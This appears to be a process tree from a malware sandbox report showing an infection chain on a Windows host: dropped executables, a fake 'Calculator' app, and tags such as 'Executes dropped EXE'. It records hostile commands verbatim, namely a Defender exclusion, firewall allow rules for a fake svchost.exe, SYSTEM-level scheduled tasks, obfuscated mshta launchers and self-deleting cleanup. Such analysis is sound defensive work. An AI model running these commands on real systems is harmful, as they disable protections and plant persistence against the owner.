C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffcbd47dec0,0x7ffcbd47ded0,0x7ffcbd47dee010⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ff64d709e70,0x7ff64d709e80,0x7ff64d709e9011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,12060395314990717915,4153827000368964774,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9660_1267978480" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1620 /prefetch:210⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,12060395314990717915,4153827000368964774,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9660_1267978480" --mojo-platform-channel-handle=1820 /prefetch:810⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\0XwBVgDT3ezgJG3_0dQD72qz.exe"C:\Users\Admin\Pictures\Adobe Films\0XwBVgDT3ezgJG3_0dQD72qz.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05a277b9a3d2.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05a277b9a3d2.exeFri05a277b9a3d2.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05a277b9a3d2.exeC:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri05a277b9a3d2.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri051e1e7444.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC8E490E3\Fri051e1e7444.exeFri051e1e7444.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\sh4hflfTIu9X6CgvU_tIR6x4.exe"C:\Users\Admin\Pictures\Adobe Films\sh4hflfTIu9X6CgvU_tIR6x4.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\tPwENUt61mkw9jaaKJZITT4q.exe"C:\Users\Admin\Pictures\Adobe Films\tPwENUt61mkw9jaaKJZITT4q.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 2566⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\dWSLTf9aevg5YZImfbAMqQKt.exe"C:\Users\Admin\Pictures\Adobe Films\dWSLTf9aevg5YZImfbAMqQKt.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\djOzqaDxuN4ftzSDioAOukfA.exe"C:\Users\Admin\Pictures\Adobe Films\djOzqaDxuN4ftzSDioAOukfA.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\fpnxpWGlulH21GfBlEce4NmL.exe"C:\Users\Admin\Pictures\Adobe Films\fpnxpWGlulH21GfBlEce4NmL.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\li1YaZUKqd.bat"6⤵
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵
-
C:\PerfLogs\smss.exe"C:\PerfLogs\smss.exe"7⤵
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\Pictures\Adobe Films\AzLsZLp_D4ayNkuN341bjJBG.exe"C:\Users\Admin\Pictures\Adobe Films\AzLsZLp_D4ayNkuN341bjJBG.exe"5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\7KwyEbC_NANhTQEeLeSH13jc.exe"C:\Users\Admin\Pictures\Adobe Films\7KwyEbC_NANhTQEeLeSH13jc.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 2526⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\Jj7boAeoG56W1zy74ULeu0nk.exe"C:\Users\Admin\Pictures\Adobe Films\Jj7boAeoG56W1zy74ULeu0nk.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 17486⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\F3GlpsiIrfzDVicX03Ub1cxP.exe"C:\Users\Admin\Pictures\Adobe Films\F3GlpsiIrfzDVicX03Ub1cxP.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\4BqjvA9G3qh1x_0g7cfYqK0k.exe"C:\Users\Admin\Pictures\Adobe Films\4BqjvA9G3qh1x_0g7cfYqK0k.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\6⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM6⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal6⤵
-
C:\Users\Admin\Pictures\Adobe Films\mp7Vk_cGSKQF_a2Ibkt1jyyO.exe"C:\Users\Admin\Pictures\Adobe Films\mp7Vk_cGSKQF_a2Ibkt1jyyO.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\mp7Vk_cGSKQF_a2Ibkt1jyyO.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\mp7Vk_cGSKQF_a2Ibkt1jyyO.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
-
C:\Users\Admin\Pictures\Adobe Films\McdwmM9yiVXViMdMLT2CYjKO.exe"C:\Users\Admin\Pictures\Adobe Films\McdwmM9yiVXViMdMLT2CYjKO.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\McdwmM9yiVXViMdMLT2CYjKO.exe"C:\Users\Admin\Pictures\Adobe Films\McdwmM9yiVXViMdMLT2CYjKO.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\GYm5cBJ0pNxSWLyCMO8rktun.exe"C:\Users\Admin\Pictures\Adobe Films\GYm5cBJ0pNxSWLyCMO8rktun.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1166618.exe"C:\Users\Admin\AppData\Roaming\1166618.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\6843314.exe"C:\Users\Admin\AppData\Roaming\6843314.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\7383269.exe"C:\Users\Admin\AppData\Roaming\7383269.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5795695.exe"C:\Users\Admin\AppData\Roaming\5795695.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8246734.exe"C:\Users\Admin\AppData\Roaming\8246734.exe"6⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\8090362.exe"C:\Users\Admin\AppData\Roaming\8090362.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\0ZczbYCvQV_ikxNuZbNQ7AKv.exe"C:\Users\Admin\Pictures\Adobe Films\0ZczbYCvQV_ikxNuZbNQ7AKv.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-5OC0M.tmp\0ZczbYCvQV_ikxNuZbNQ7AKv.tmp"C:\Users\Admin\AppData\Local\Temp\is-5OC0M.tmp\0ZczbYCvQV_ikxNuZbNQ7AKv.tmp" /SL5="$70254,506127,422400,C:\Users\Admin\Pictures\Adobe Films\0ZczbYCvQV_ikxNuZbNQ7AKv.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\GiF4PhaN6EmQoBJJNwjurt9l.exe"C:\Users\Admin\Pictures\Adobe Films\GiF4PhaN6EmQoBJJNwjurt9l.exe"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=16⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffcbd47dec0,0x7ffcbd47ded0,0x7ffcbd47dee08⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1b8,0x1bc,0x1c0,0x194,0x1c4,0x7ff64d709e70,0x7ff64d709e80,0x7ff64d709e909⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=1836 /prefetch:88⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1780 /prefetch:28⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=2232 /prefetch:88⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2548 /prefetch:18⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=2436 /prefetch:88⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --mojo-platform-channel-handle=2696 /prefetch:18⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3176 /prefetch:28⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=3760 /prefetch:88⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=1776 /prefetch:88⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=840 /prefetch:88⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1752,8520893134832462361,13867695246700994894,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9648_1595469196" --mojo-platform-channel-handle=2276 /prefetch:88⤵
-
C:\Users\Admin\Pictures\Adobe Films\YwfX9VEMCM0I8tKzQEPvHqNf.exe"C:\Users\Admin\Pictures\Adobe Films\YwfX9VEMCM0I8tKzQEPvHqNf.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\0COn9mQq2c06dY1_MSTZTeAr.exe"C:\Users\Admin\Pictures\Adobe Films\0COn9mQq2c06dY1_MSTZTeAr.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\kFymlZ9bOtriLI_9SMXatxO1.exe"C:\Users\Admin\Pictures\Adobe Films\kFymlZ9bOtriLI_9SMXatxO1.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\jTpJDXJu0rO2dvjCK2d8f8y3.exe"C:\Users\Admin\Pictures\Adobe Films\jTpJDXJu0rO2dvjCK2d8f8y3.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\aDpjh1ksoewfrV4qxYgfCwyx.exe"C:\Users\Admin\Pictures\Adobe Films\aDpjh1ksoewfrV4qxYgfCwyx.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\xjdvs1LgMYNI2r3DKw2G3P7q.exe"C:\Users\Admin\Pictures\Adobe Films\xjdvs1LgMYNI2r3DKw2G3P7q.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\87FzARwIAtus5eRStKnoTUrM.exe"C:\Users\Admin\Documents\87FzARwIAtus5eRStKnoTUrM.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\lFrV0H5WFY4rYVRYwcn82CIk.exe"C:\Users\Admin\Pictures\Adobe Films\lFrV0H5WFY4rYVRYwcn82CIk.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\vmxG6y17agDXIFl0WrvIMGYj.exe"C:\Users\Admin\Pictures\Adobe Films\vmxG6y17agDXIFl0WrvIMGYj.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\vmxG6y17agDXIFl0WrvIMGYj.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\vmxG6y17agDXIFl0WrvIMGYj.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\vmxG6y17agDXIFl0WrvIMGYj.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\vmxG6y17agDXIFl0WrvIMGYj.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "vmxG6y17agDXIFl0WrvIMGYj.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\Fmj0Lz0Ez3X0ixz2HwOQLRlN.exe"C:\Users\Admin\Pictures\Adobe Films\Fmj0Lz0Ez3X0ixz2HwOQLRlN.exe" /mixtwo7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 2568⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\B4y_EASV2PYiiQ2KLAuWbSfl.exe"C:\Users\Admin\Pictures\Adobe Films\B4y_EASV2PYiiQ2KLAuWbSfl.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7248 -s 2608⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\vpV9faJ2l3iuMS1S0EcvzKDT.exe"C:\Users\Admin\Pictures\Adobe Films\vpV9faJ2l3iuMS1S0EcvzKDT.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\4kgYjrUwfZuIqD6jgxXFJvig.exe"C:\Users\Admin\Pictures\Adobe Films\4kgYjrUwfZuIqD6jgxXFJvig.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\ZM2sQl0eWse_3_2e51qEoUc8.exe"C:\Users\Admin\Pictures\Adobe Films\ZM2sQl0eWse_3_2e51qEoUc8.exe"7⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"9⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffcbd47dec0,0x7ffcbd47ded0,0x7ffcbd47dee010⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1688,14005092575502944277,10918929220183409607,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10732_962923810" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1704 /prefetch:210⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1688,14005092575502944277,10918929220183409607,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10732_962923810" --mojo-platform-channel-handle=1752 /prefetch:810⤵
-
C:\Users\Admin\Pictures\Adobe Films\uzfSFO5ZcWEZJuaosWK2DY1z.exe"C:\Users\Admin\Pictures\Adobe Films\uzfSFO5ZcWEZJuaosWK2DY1z.exe"7⤵
-
